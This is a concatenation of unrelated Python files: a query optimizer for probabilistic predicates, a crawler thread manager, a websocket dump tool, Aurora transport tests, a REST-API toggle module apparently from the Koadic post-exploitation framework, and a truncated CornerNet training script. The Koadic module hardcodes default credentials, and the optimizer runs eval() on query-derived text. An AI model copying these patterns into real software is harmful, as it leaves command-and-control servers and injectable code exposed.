alternate_string = alternate_string[:-len(" && ")] #must strip the last ' || '
#query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
elif l_desc[0] == constants.CONTINUOUS:
equivalence = [self.convertL2S([query_sub_list], [])]
assert(operator == "=" or operator == "!=" or operator == "<"
or operator == "<=" or operator == ">" or operator == ">=")
alternate_string = ""
if operator == "!=":
alternate_string += subject + ">" + object + " && " + subject + "<" + object
query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(query_tmp)
if operator == "<" or operator == "<=":
object_num = eval(object)
for number in l_desc[1]:
if number > object_num:
alternate_string = subject + operator + str(number)
#query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
if operator == ">" or operator == ">=":
object_num = eval(object)
for number in l_desc[1]:
if number < object_num:
alternate_string = subject + operator + str(number)
#query_tmp, _ = self._parseQuery(alternate_string)
equivalence.append(alternate_string)
equivalences.append(equivalence)
possible_queries = product(*equivalences)
for q in possible_queries:
query_transformed.append( q )
return query_transformed, query_operators
def _compute_expression(self, query_info, pp_list, pp_stats, k, accuracy_budget):
"""
def QueryOptimizer(P, {trained PPs}):
P = wrangler(P)
{E} = compute_expressions(P,{trained PP},k) #k is a fixed constant which limits number of individual PPs
in the final expression
for E in {E}:
Explore_PP_accuracy_budget(E) # Paper says dynamic program
Explore_PP_Orderings(E) #if k is small, any number of orders can be explored
Compute_cost_vs_red_rate(E) #arithmetic over individual c,a and r[a] numbers
return E_with_max_c/r
1. p^(P/p) -> PPp
2. PPp^q -> PPp ^ PPq
3. PPpvq -> PPp v PPq
4. p^(P/p) -> ~PP~q
-> we don't need to apply these rules, we simply need to see for each sub query which PP gives us the best rate
:param query_info: [possible query forms for a given query, operators that go in between]
:param pp_list: list of pp names that are currently available
:param pp_stats: list of pp models associated with each pp name with R,C,A values saved
:param k: number of pps we can use at maximum
:return: the list of pps to use that maximizes reduction rate (ATM)
"""
evaluations = []
evaluation_models = []
evaluations_stats = []
query_transformed, query_operators = query_info
#query_transformed = [[["t", "!=", "car"], ["t", "=", "van"]], ... ]
for possible_query in query_transformed:
evaluation = []
evaluation_stats = []
k_count = 0
op_index = 0
for query_sub in possible_query: #Even inside query_sub it can be divided into query_sub_sub
if k_count > k: #TODO: If you exceed a certain number, you just ignore the expression
evaluation = []
evaluation_stats = []
continue
query_sub_list, query_sub_operators = self._parseQuery(query_sub)
evaluation_tmp = []
evaluation_models_tmp = []
evaluation_stats_tmp = []
for i in range(len(query_sub_list)):
query_sub_str = ''.join(query_sub_list[i])
if query_sub_str in pp_list:
#Find the best model for the pp
data = self._find_model(query_sub_str, pp_stats, accuracy_budget)
if data == None:
continue
else:
model, reduction_rate = data
evaluation_tmp.append(query_sub_str)
evaluation_models_tmp.append(model) #TODO: We need to make sure this is the model_name
evaluation_stats_tmp.append(reduction_rate)
k_count += 1
reduc_rate = 0
if len(evaluation_stats_tmp) != 0:
reduc_rate = self._update_stats(evaluation_stats_tmp, query_sub_operators)
evaluation.append(query_sub)
evaluation_models.append(evaluation_models_tmp)
evaluation_stats.append(reduc_rate)
op_index += 1
evaluations.append( self.convertL2S(evaluation, query_operators) )
evaluations_stats.append( self._update_stats(evaluation_stats, query_operators) )
max_index = np.argmax(np.array(evaluations_stats), axis = 0)
best_query = evaluations[max_index] #this will be something like "t!=bus && t!=truck && t!=car"
best_models = evaluation_models[max_index]
best_reduction_rate = evaluations_stats[max_index]
pp_names, op_names = self._convertQuery2PPOps(best_query)
return [list(zip(pp_names, best_models)), op_names, best_reduction_rate]
def _convertQuery2PPOps(self, query):
"""
:param query: str (t!=car && t!=truck)
:return:
"""
query_split = query.split(" ")
pp_names = []
op_names = []
for i in range(len(query_split)):
if i % 2 == 0:
pp_names.append(query_split[i])
else:
if query_split[i] == "&&":
op_names.append(np.logical_and)
else:
op_names.append(np.logical_or)
return pp_names, op_names
#Make this function take in the list of reduction rates and the operator lists
def _update_stats(self, evaluation_stats, query_operators):
if len(evaluation_stats) == 0:
return 0
final_red = evaluation_stats[0]
assert(len(evaluation_stats) == len(query_operators) + 1)
for i in range(1, len(evaluation_stats)):
if query_operators[i - 1] == "&&":
final_red = final_red + evaluation_stats[i] - final_red * evaluation_stats[i]
elif query_operators[i - 1] == "||":
final_red = final_red * evaluation_stats[i]
return final_red
def _compute_cost_red_rate(self, C, R):
assert(R >= 0 and R <= 1) #R is reduction rate and should be between 0 and 1
if R == 0:
R = 0.000001
return float(C) / R
def _find_model(self, pp_name, pp_stats, accuracy_budget):
possible_models = pp_stats[pp_name]
best = [] #[best_model_name, best_model_cost / best_model_reduction_rate]
for possible_model in possible_models:
if possible_models[possible_model]["A"] < accuracy_budget:
continue
if best == []:
best = [possible_model, self._compute_cost_red_rate(possible_models[possible_model]["C"],
possible_models[possible_model]["R"]),
possible_models[possible_model]["R"]]
else:
alternative_best_cost = self._compute_cost_red_rate(possible_models[possible_model]["C"],
possible_models[possible_model]["R"])
if alternative_best_cost < best[1]:
best = [possible_model, alternative_best_cost, possible_models[possible_model]["R"]]
if best == []:
return None
else:
return best[0], best[2]
def run(self, query, pp_list, pp_stats, label_desc, k = 3, accuracy_budget = 0.9):
    """
    :param query: query of interest ex) TRAF-20
    :param pp_list: list of pp_descriptions - queries that are available
    :param pp_stats: this will be dictionary where keys are "pca/ddn",
      it will have statistics saved which are R (reduction_rate), C (cost_to_train), A (accuracy)
    :param label_desc: per-column description of the label domain (discrete
      value lists / continuous breakpoints) used to rewrite the query
    :param k: number of different PPs that are in any expression E
    :param accuracy_budget: minimum accuracy a candidate model must meet
    :return: selected PPs to use for reduction
    """
    # _wrangler rewrites the user query into equivalent candidate forms plus
    # the operator list ("&&"/"||") joining the sub-predicates.
    query_transformed, query_operators = self._wrangler(query, label_desc)
    #query_transformed is a comprehensive list of transformed queries
    return self._compute_expression([query_transformed, query_operators], pp_list, pp_stats, k, accuracy_budget)
if __name__ == "__main__":
    # Demo over a traffic-camera schema: t = vehicle type, s = speed,
    # c = color, i = inbound intersection, o = outbound intersection.
    query_list = ["t=suv", "s>60",
                  "c=white", "c!=white", "o=pt211", "c=white && t=suv",
                  "s>60 && s<65", "t=sedan || t=truck", "i=pt335 && o=pt211",
                  "t=suv && c!=white", "c=white && t!=suv && t!=van",
                  "t=van && s>60 && s<65", "c!=white && (t=sedan || t=truck)",
                  "i=pt335 && o!=pt211 && o!=pt208", "t=van && i=pt335 && o=pt211",
                  "t!=sedan && c!=black && c!=silver && t!=truck",
                  "t=van && s>60 && s<65 && o=pt211", "t!=suv && t!=van && c!=red && t!=white",
                  "(i=pt335 || i=pt342) && o!=pt211 && o!=pt208",
                  "i=pt335 && o=pt211 && t=van && c=red"]
    #TODO: Support for parenthesis queries
    # Same list with the parenthesized queries rewritten without parentheses,
    # since parentheses are not supported yet.
    query_list_mod = ["t=suv", "s>60",
                      "c=white", "c!=white", "o=pt211", "c=white && t=suv",
                      "s>60 && s<65", "t=sedan || t=truck", "i=pt335 && o=pt211",
                      "t=suv && c!=white", "c=white && t!=suv && t!=van",
                      "t=van && s>60 && s<65", "t=sedan || t=truck && c!=white",
                      "i=pt335 && o!=pt211 && o!=pt208", "t=van && i=pt335 && o=pt211",
                      "t!=sedan && c!=black && c!=silver && t!=truck",
                      "t=van && s>60 && s<65 && o=pt211", "t!=suv && t!=van && c!=red && t!=white",
                      "i=pt335 || i=pt342 && o!=pt211 && o!=pt208",
                      "i=pt335 && o=pt211 && t=van && c=red"]
    query_list_test = ["c=white && t!=suv && t!=van"]
    # Predicates for which a probabilistic predicate (PP) is available.
    synthetic_pp_list = ["t=suv", "t=van", "t=sedan", "t=truck",
                         "c=red", "c=white", "c=black", "c=silver",
                         "s>40", "s>50", "s>60", "s<65", "s<70",
                         "i=pt335", "i=pt211", "i=pt342", "i=pt208",
                         "o=pt335", "o=pt211", "o=pt342", "o=pt208"]
    query_list_short = ["t=van && s>60 && o=pt211"]
    synthetic_pp_list_short = ["t=van", "s>60", "o=pt211"]
    #TODO: Might need to change this to a R vs A curve instead of static numbers
    #TODO: When selecting appropriate PPs, we only select based on reduction rate
    # Per-predicate, per-model statistics:
    #   R = reduction rate, C = cost to train, A = accuracy.
    synthetic_pp_stats_short = {"t=van" :{ "none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
                                           "pca/dnn": {"R": 0.2, "C": 0.15, "A": 0.92},
                                           "none/kde": {"R": 0.15, "C": 0.05, "A": 0.95}},
                                "s>60" :{ "none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
                                          "none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
                                "o=pt211" :{ "none/dnn": {"R": 0.13, "C": 0.32, "A": 0.99},
                                             "none/kde": {"R": 0.14, "C": 0.12, "A": 0.93}} }
    synthetic_pp_stats = {"t=van": {"none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
                                    "pca/dnn": {"R": 0.2, "C": 0.15, "A": 0.92},
                                    "none/kde": {"R": 0.15, "C": 0.05, "A": 0.95}},
                          "t=suv": {"none/svm": {"R": 0.13, "C": 0.01, "A": 0.95}},
                          "t=sedan": {"none/svm": {"R": 0.21, "C": 0.01, "A": 0.94}},
                          "t=truck": {"none/svm": {"R": 0.05, "C": 0.01, "A": 0.99}},
                          "c=red": {"none/svm": {"R": 0.131, "C": 0.011, "A": 0.951}},
                          "c=white": {"none/svm": {"R": 0.212, "C": 0.012, "A": 0.942}},
                          "c=black": {"none/svm": {"R": 0.133, "C": 0.013, "A": 0.953}},
                          "c=silver": {"none/svm": {"R": 0.214, "C": 0.014, "A": 0.944}},
                          "s>40": {"none/svm": {"R": 0.08, "C": 0.20, "A": 0.8}},
                          "s>50": {"none/svm": {"R": 0.10, "C": 0.20, "A": 0.82}},
                          "s>60": {"none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
                                   "none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
                          "s<65": {"none/svm": {"R": 0.05, "C": 0.20, "A": 0.8}},
                          "s<70": {"none/svm": {"R": 0.02, "C": 0.20, "A": 0.9}},
                          "o=pt211": {"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
                                      "none/kde": {"R": 0.143, "C": 0.123, "A": 0.932}},
                          "o=pt335": {"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
                                      "none/kde": {"R": 0.144, "C": 0.124, "A": 0.934}},
                          "o=pt342": {"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
                                      "none/kde": {"R": 0.145, "C": 0.125, "A": 0.935}},
                          "o=pt208": {"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
                                      "none/kde": {"R": 0.146, "C": 0.126, "A": 0.936}},
                          "i=pt211": {"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
                                      "none/kde": {"R": 0.143, "C": 0.123, "A": 0.932}},
                          "i=pt335": {"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
                                      "none/kde": {"R": 0.144, "C": 0.124, "A": 0.934}},
                          "i=pt342": {"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
                                      "none/kde": {"R": 0.145, "C": 0.125, "A": 0.935}},
                          "i=pt208": {"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
                                      "none/kde": {"R": 0.146, "C": 0.126, "A": 0.936}}}
    #TODO: We will need to convert the queries/labels into "car, bus, van, others". This is how the dataset defines things
    # Column domains: DISCRETE columns list valid values, CONTINUOUS columns
    # list the breakpoints used to bucket the range.
    label_desc = {"t": [constants.DISCRETE, ["sedan", "suv", "truck", "van"]],
                  "s": [constants.CONTINUOUS, [40, 50, 60, 65, 70]],
                  "c": [constants.DISCRETE, ["white", "red", "black", "silver"]],
                  "i": [constants.DISCRETE, ["pt335", "pt342", "pt211", "pt208"]],
                  "o": [constants.DISCRETE, ["pt335", "pt342", "pt211", "pt208"]]}
    qo = QueryOptimizer()
    print("Running Query Optimizer Demo...")
    for query in query_list_mod:
        print(query, " -> ", (qo.run(query, synthetic_pp_list, synthetic_pp_stats, label_desc)) )
    #print qo.run(query, synthetic_pp_list_short, synthetic_pp_stats_short, label_desc)
|
thread_manager.py | from threading import Thread
class ThreadsManager:
    """Fans a query out to crawler callables, one thread per crawler."""

    def __init__(self):
        # Shared list that every crawler appends its results into.
        self.results = []
        # Threads created by init_thread_pool.
        self.thread_pool = []

    def init_thread_pool(self, query, crawlers):
        """
        Method to create threads and assign crawlers to each
        of the threads. Each thread then will start processing
        the query and once all the threads join, the results will
        be returned
        :param query:
        :param crawlers:
        :return: data:[LibraryResult] => results from the crawlers
        """
        for worker in crawlers:
            # Each crawler is invoked as worker(query, results).
            t = Thread(target=worker, args=[query, self.results])
            self.thread_pool.append(t)
            t.start()
        for t in self.thread_pool:
            t.join()
        return self.results
|
wsdump.py | #!/usr/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return stdin's encoding in lower case, defaulting to "utf-8"."""
    encoding = getattr(sys.stdin, "encoding", "")
    return encoding.lower() if encoding else "utf-8"
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
    """Verbosity action: accepts a numeric level ("-v 2") or repeated
    v's ("-vv"); a bare flag counts as level 1."""

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            values = "1"
        try:
            level = int(values)
        except ValueError:
            # Non-numeric form such as "vv": each extra "v" bumps the level.
            level = values.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Build and parse the command-line options for the dump tool."""
    parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    parser.add_argument("url", metavar="ws_url",
                        help="websocket url. ex. ws://echo.websocket.org/")
    parser.add_argument("-p", "--proxy",
                        help="proxy url. ex. http://127.0.0.1:8080")
    # VAction lets -v take either a number or repeated v's.
    parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                        dest="verbose",
                        help="set verbose mode. If set to 1, show opcode. "
                        "If set to 2, enable to trace websocket module")
    parser.add_argument("-n", "--nocert", action='store_true',
                        help="Ignore invalid SSL cert")
    parser.add_argument("-r", "--raw", action="store_true",
                        help="raw output")
    parser.add_argument("-s", "--subprotocols", nargs='*',
                        help="Set subprotocols")
    parser.add_argument("-o", "--origin",
                        help="Set origin")
    parser.add_argument("--eof-wait", default=0, type=int,
                        help="wait time(second) after 'EOF' received.")
    parser.add_argument("-t", "--text",
                        help="Send initial text")
    parser.add_argument("--timings", action="store_true",
                        help="Print timings in seconds")
    parser.add_argument("--headers",
                        help="Set custom headers. Use ',' as separator")
    return parser.parse_args()
class RawInput:
    """Prompt helper that normalizes console input to UTF-8 bytes on both
    Python 2 and Python 3 (via six)."""

    def raw_input(self, prompt):
        # input() on py3, raw_input() on py2.
        if six.PY3:
            line = input(prompt)
        else:
            line = raw_input(prompt)
        # py2 byte input in a non-UTF-8 console: transcode to UTF-8.
        if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
            line = line.decode(ENCODING).encode("utf-8")
        # Text input: encode to UTF-8 bytes so the caller always gets bytes.
        elif isinstance(line, six.text_type):
            line = line.encode("utf-8")
        return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Interactive console that shows incoming frames in blue and keeps a
    '> ' prompt on screen."""

    def write(self, data):
        # Erase the pending prompt line, emit the message in blue, then
        # redraw the prompt.
        out = sys.stdout
        for chunk in ("\033[2K\033[E",
                      "\033[34m< " + data + "\033[39m",
                      "\n> "):
            out.write(chunk)
        out.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain line-oriented console used for --raw mode (no ANSI escapes)."""

    def write(self, data):
        sys.stdout.write(data + "\n")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to the websocket URL and relay frames to/from the console."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # -n: skip certificate and hostname verification.
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = map(str.strip, args.headers.split(','))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
    print("Press Ctrl+C to quit")

    def recv():
        # Receive one frame; normalize errors/close/ping into (opcode, data).
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            # Answer pings ourselves so the connection stays alive.
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data

    def recv_ws():
        # Reader loop (runs on a daemon thread): print every incoming message.
        while True:
            opcode, data = recv()
            msg = None
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if not args.verbose and opcode in OPCODE_DATA:
                msg = data
            elif args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    # Writer loop: read console lines and send them until EOF or Ctrl+C.
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # Top-level catch-all: report the failure message instead of a
        # full traceback.
        print(e)
|
test_transport.py | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from threading import Thread
import pytest
import requests
from mock import ANY, Mock, call, create_autospec
from requests import exceptions as request_exceptions
from thrift.protocol import TBinaryProtocol
from thrift.server import THttpServer
from thrift.transport import TTransport
from apache.aurora.common.transport import DEFAULT_USER_AGENT, TRequestsTransport
from gen.apache.aurora.api import ReadOnlyScheduler
from gen.apache.aurora.api.ttypes import Response, ResponseCode, ServerInfo
class ReadOnlySchedulerHandler(object):
    """Minimal ReadOnlyScheduler implementation for the in-process test server."""

    def getRoleSummary(self):  # noqa
        # Fixed OK response with a known cluster name the tests assert on.
        server_info = ServerInfo(clusterName='west')
        return Response(responseCode=ResponseCode.OK, serverInfo=server_info)
def test_request_transport_integration():
    """End-to-end round trip against a real THttpServer on an ephemeral port."""
    handler = ReadOnlySchedulerHandler()
    processor = ReadOnlyScheduler.Processor(handler)
    pfactory = TBinaryProtocol.TBinaryProtocolAcceleratedFactory()
    # Port 0 lets the OS pick a free port; read the actual port back below.
    server = THttpServer.THttpServer(processor, ('localhost', 0), pfactory)
    server_thread = Thread(target=server.serve)
    server_thread.start()
    _, server_port = server.httpd.socket.getsockname()
    try:
        transport = TRequestsTransport('http://localhost:%d' % server_port)
        protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
        client = ReadOnlyScheduler.Client(protocol)
        response = client.getRoleSummary()
    finally:
        # Always stop the server thread, even if the RPC fails.
        server.httpd.shutdown()
    assert response is not None
    assert response.responseCode == ResponseCode.OK
    assert response.serverInfo.clusterName == 'west'
    transport.close()
def test_request_transport_timeout():
    """A requests Timeout surfaces as TTransportException with a clear message."""
    session = create_autospec(spec=requests.Session, instance=True)
    session.headers = {}
    session.post = Mock(side_effect=request_exceptions.Timeout())
    transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
    protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
    client = ReadOnlyScheduler.Client(protocol)
    with pytest.raises(TTransport.TTransportException) as execinfo:
        client.getRoleSummary()
    assert execinfo.value.message == 'Timed out talking to http://localhost:12345'
    transport.close()
def test_raise_for_status_causes_exception():
    """An HTTP 503 from the scheduler maps to an UNKNOWN TTransportException."""
    response = requests.Response()
    response.status_code = 503
    session = create_autospec(spec=requests.Session, instance=True)
    session.headers = {}
    session.post.return_value = response
    transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
    protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
    client = ReadOnlyScheduler.Client(protocol)
    with pytest.raises(TTransport.TTransportException) as excinfo:
        client.getRoleSummary()
    assert excinfo.value.type == TTransport.TTransportException.UNKNOWN
    assert excinfo.value.message.startswith('Unknown error talking to http://localhost:12345')
    transport.close()
def test_raises_auth_error():
    """An HTTP 401 from the scheduler raises the transport's AuthError."""
    response = requests.Response()
    response.status_code = 401
    session = create_autospec(spec=requests.Session, instance=True)
    session.headers = {}
    session.post.return_value = response
    transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
    protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
    client = ReadOnlyScheduler.Client(protocol)
    with pytest.raises(TRequestsTransport.AuthError):
        client.getRoleSummary()
    transport.close()
def test_request_any_other_exception():
    """Any other requests error (e.g. ConnectionError) becomes a TTransportException."""
    session = create_autospec(spec=requests.Session, instance=True)
    session.headers = {}
    session.post = Mock(side_effect=request_exceptions.ConnectionError())
    transport = TRequestsTransport('http://localhost:12345', session_factory=lambda: session)
    protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
    client = ReadOnlyScheduler.Client(protocol)
    with pytest.raises(TTransport.TTransportException):
        client.getRoleSummary()
    transport.close()
def test_requests_transports_lowers_logging_level():
    """Constructing the transport raises the 'requests' logger level to WARNING."""
    logging.getLogger('requests').setLevel(logging.NOTSET)
    # NOTE(review): this session_factory takes an argument (lambda x: ...)
    # while every other test uses a zero-arg factory; it is never invoked in
    # this test, but would fail if the transport called it — confirm the
    # expected factory signature.
    TRequestsTransport(
        'http://localhost:12345',
        session_factory=lambda x: create_autospec(spec=requests.Session, instance=True))
    assert logging.getLogger('requests').level == logging.WARNING
def test_transport_applies_user_agent_from_factory():
    """An explicit user_agent argument is applied to the session headers."""
    user_agent = 'Some-User-Agent'
    transport = TRequestsTransport('http://localhost:12345', user_agent=user_agent)
    transport.open()
    assert transport._session.headers['User-Agent'] == user_agent
def test_transport_applies_default_user_agent_if_no_factory_provided():
    """Without an explicit user_agent, DEFAULT_USER_AGENT is used."""
    transport = TRequestsTransport('http://localhost:12345')
    transport.open()
    assert transport._session.headers['User-Agent'] == DEFAULT_USER_AGENT
def test_auth_type_valid():
    """A requests AuthBase instance is accepted and forwarded to session.post."""
    response = requests.Response()
    response.status_code = 500
    session = create_autospec(spec=requests.Session, instance=True)
    session.headers = {}
    session.post.return_value = response
    auth = requests.auth.AuthBase()
    transport = TRequestsTransport('http://localhost:1', auth=auth, session_factory=lambda: session)
    protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
    client = ReadOnlyScheduler.Client(protocol)
    with pytest.raises(TTransport.TTransportException):
        client.getRoleSummary()
    transport.close()
    # BUG FIX: the original ASSIGNED to session.post.mock_calls instead of
    # asserting on it, so the auth-forwarding check never actually ran.
    session.post.assert_called_with(ANY, data=ANY, timeout=ANY, auth=auth)
def test_auth_type_invalid():
    """A non-AuthBase auth argument is rejected with TypeError."""
    with pytest.raises(TypeError) as e:
        TRequestsTransport('http://localhost:1', auth="auth")
    # NOTE(review): e.value.message is Python-2 only; on Python 3 this would
    # need str(e.value) — confirm the targeted interpreter.
    assert e.value.message == 'Invalid auth type. Expected: AuthBase but got str'
def test_requests_transport_session_reuse():
    """Consecutive RPCs reuse the same underlying requests session."""
    handler = ReadOnlySchedulerHandler()
    processor = ReadOnlyScheduler.Processor(handler)
    pfactory = TBinaryProtocol.TBinaryProtocolAcceleratedFactory()
    server = THttpServer.THttpServer(processor, ('localhost', 0), pfactory)
    server_thread = Thread(target=server.serve)
    server_thread.start()
    _, server_port = server.httpd.socket.getsockname()
    try:
        transport = TRequestsTransport('http://localhost:%d' % server_port)
        protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
        client = ReadOnlyScheduler.Client(protocol)
        client.getRoleSummary()
        # Capture the session after the first call; the second call must not
        # replace it.
        old_session = transport._session
        client.getRoleSummary()
    finally:
        server.httpd.shutdown()
    assert old_session == transport._session
    transport.close()
|
api.py | import core.rest_server
import time
import sys
import os
DESCRIPTION = "turn off/on the rest api"
def autocomplete(shell, line, text, state):
    """No completions for this command; always returns None."""
    return None
def help(shell):
    """No extra help text for this command."""
    return None
def execute(shell, cmd):
    """Turn the REST API server on or off.

    Syntax: api <on|1|off|0> [--user NAME] [--pass PW] [--port N]
    Starting spawns a background KThread that serves the REST API; stopping
    kills that thread.
    """
    splitted = cmd.split()
    if len(splitted) > 1:
        # Defaults used when the flags are not supplied.
        username = "koadic"
        password = "koadic"
        port = "9990"
        if "--user" in splitted:
            username = splitted[splitted.index("--user")+1]
        if "--pass" in splitted:
            password = splitted[splitted.index("--pass")+1]
        if "--port" in splitted:
            port = splitted[splitted.index("--port")+1]
        sw = splitted[1].lower()
        if sw == "1" or sw == "on":
            if not shell.rest_thread:
                rest_server = core.rest_server.RestServer(shell, port, username, password)
                def thread_rest_server():
                    # Swallow SystemExit so a server shutdown does not kill
                    # the whole shell.
                    try:
                        rest_server.run()
                    except SystemExit as e:
                        pass
                # Silence server start-up chatter by pointing stdout at
                # devnull while the thread spins up.
                stdout = sys.stdout
                f = open(os.devnull, 'w')
                sys.stdout = f
                shell.rest_thread = core.rest_server.KThread(target=thread_rest_server)
                shell.rest_thread.daemon = True
                shell.rest_thread.start()
                time.sleep(1)
                sys.stdout = stdout
                if shell.rest_thread:
                    shell.print_good("Rest server running on port %s" % port)
                    shell.print_status("Username: %s" % username)
                    shell.print_status("Password: %s" % password)
                    shell.print_status("API Token: %s" % rest_server.token)
                else:
                    shell.print_error("Could not start rest server: ")
            else:
                shell.print_error("Rest server already running")
        else:
            if shell.rest_thread:
                shell.rest_thread.kill()
                shell.rest_thread = ""
                shell.print_good("Rest server shutdown")
            else:
                shell.print_error("Rest server not running")
|
train.py | #!/usr/bin/env python
import argparse
import importlib
import json
import os
import pprint
import queue
import random
import threading
import traceback
import numpy as np
import torch
from torch.multiprocessing import Pool, Process, Queue
from tqdm import tqdm
from config import system_configs
from db.datasets import datasets
from nnet.py_factory import NetworkFactory
from utils import stdout_to_tqdm
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
    """Parse the command-line arguments for CornerNet training."""
    parser = argparse.ArgumentParser(description="Train CornerNet")
    parser.add_argument("cfg_file", help="config file", type=str)
    parser.add_argument("--iter", dest="start_iter",
                        help="train at iteration i",
                        default=0, type=int)
    parser.add_argument("--threads", dest="threads", default=4, type=int)
    return parser.parse_args()
def prefetch_data(db, queue, sample_data, data_aug):
    """Worker-process loop: sample batches from *db* forever into *queue*."""
    ind = 0
    print("start prefetching data...")
    # Seed with the PID so parallel workers draw different samples.
    np.random.seed(os.getpid())
    while True:
        try:
            data, ind = sample_data(db, ind, data_aug=data_aug)
            queue.put(data)
        except Exception as e:
            # Log the traceback before propagating so the failure is visible
            # even though this runs in a child process.
            traceback.print_exc()
            raise e
def pin_memory(data_queue, pinned_data_queue, sema):
    """Thread loop: move batches into pinned (page-locked) host memory for
    faster host-to-GPU transfer; exits once *sema* is released."""
    while True:
        data = data_queue.get()
        data["xs"] = [x.pin_memory() for x in data["xs"]]
        data["ys"] = [y.pin_memory() for y in data["ys"]]
        pinned_data_queue.put(data)
        # The trainer releases the semaphore to request shutdown.
        if sema.acquire(blocking=False):
            return
def init_parallel_jobs(dbs, queue, fn, data_aug):
    """Start one daemon prefetch process per database; return the processes."""
    tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
    for task in tasks:
        # Daemonize so the workers die with the main process.
        task.daemon = True
        task.start()
    return tasks
def train(training_dbs, validation_db, start_iter=0):
    """Train the network, validating and snapshotting on the configured schedule.

    :param training_dbs: one training dataset handle per prefetch process
    :param validation_db: validation dataset handle
    :param start_iter: iteration to resume from (0 = fresh run)
    """
    learning_rate    = system_configs.learning_rate
    max_iteration    = system_configs.max_iter
    pretrained_model = system_configs.pretrain
    snapshot         = system_configs.snapshot
    val_iter         = system_configs.val_iter
    display          = system_configs.display
    decay_rate       = system_configs.decay_rate
    stepsize         = system_configs.stepsize

    # getting the size of each database
    training_size   = len(training_dbs[0].db_inds)
    validation_size = len(validation_db.db_inds)

    # queues storing data for training
    training_queue   = Queue(system_configs.prefetch_size)
    validation_queue = Queue(5)

    # queues storing pinned data for training
    pinned_training_queue   = queue.Queue(system_configs.prefetch_size)
    pinned_validation_queue = queue.Queue(5)

    # load data sampling function
    data_file   = "sample.{}".format(training_dbs[0].data)
    sample_data = importlib.import_module(data_file).sample_data

    # allocating resources for parallel reading
    training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
    # BUG FIX: default to an empty list so the termination loop at the bottom
    # does not raise NameError when val_iter is falsy.
